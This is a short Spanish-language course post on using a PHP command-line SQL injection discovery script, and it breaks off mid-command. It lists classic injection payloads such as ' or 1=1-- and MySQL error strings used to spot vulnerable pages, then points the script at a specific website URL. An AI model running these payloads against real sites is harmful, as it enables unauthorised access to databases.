Sql Injection Tool - Bonus Topic
Buenas.. este tema es un bonus en el curso dado que aun no hacemos sql injection, pero aqui esta.. Como usarlo.. dado que es un script CLI. en la consola ejecutamos 1. Rellenamos el archivo de inyecciones Ejemplo. tail -f sqli_dorks.txt hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a agregue mas inyecciones en este archivo , una por linea. 2. Rellenamos el archivo de errores. Ejemplo tail -f sqli_errors.txt error mysql_error mysql_error Warning mysql_fetch_array() supplied argument You have an error in your SQL syntax; agregue mas errores en este archivo , uno por linea. 3. Ejecutamos el script de sql injection discover php gsi0.com_sqli_injection_discover.php -i sqli_dorks.txt -e sqli_errors.txt -t "www.jamesjara.com/?articuloid=123{inyectme